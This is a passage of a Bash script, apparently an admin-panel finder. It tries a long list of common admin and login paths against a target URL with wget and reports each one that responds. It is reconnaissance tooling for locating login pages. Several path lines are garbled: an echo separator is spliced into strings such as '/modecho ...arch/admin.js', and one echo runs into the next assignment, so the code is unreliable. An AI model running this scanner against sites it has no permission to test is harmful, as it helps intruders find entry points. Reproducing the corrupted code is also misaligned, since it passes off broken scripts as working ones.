wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/admin.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/admin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/index.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/index.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/index.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/index.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/index.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/index.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/index.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modecho "-----------------------------------------------------------------------"arch/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator/admin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator/admin.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator/admin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator/admin.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator/admin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator/admin.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator/admin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator/login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator/login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/moderator/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/modules/phpmyadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/myadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/navSiteAdmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/net"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/news_detail.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/newsadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/not"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/noticias"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/nsw/admin/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/nsw/admin/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/nsw/admin/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/nsw/admin/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/nsw/admin/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/openvpnadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/P/W"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pages/admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pages/admin/admin-login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pages/admin/admin-login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pages/admin/admin-login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pages/admin/admin-login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pages/admin/admin-login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pages/admin/admin-login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pages/admin/admin-login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/painel"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel/?d=cp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
echo "-----------------------------------------------------------------------
"d="/panel/js/jquery.maskedinput.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/admin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/admin.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/admin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/admin.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/admin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/admin.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/admin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/index.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/index.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/index.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/index.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/index.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/index.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/index.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/panel-administracion/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/passe"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/password"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/Personal"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pgadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/phpldapadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/phpmyadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/phppgadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/phpSQLiteAdmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/platz_login"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/power_user"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/processlogin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/processlogin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/project-admins"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/PSUser"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/pureadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/radmind"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/radmind-1"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/raiz"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/rcjakar/admin/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/rcjakar/admin/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/rcjakar/admin/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
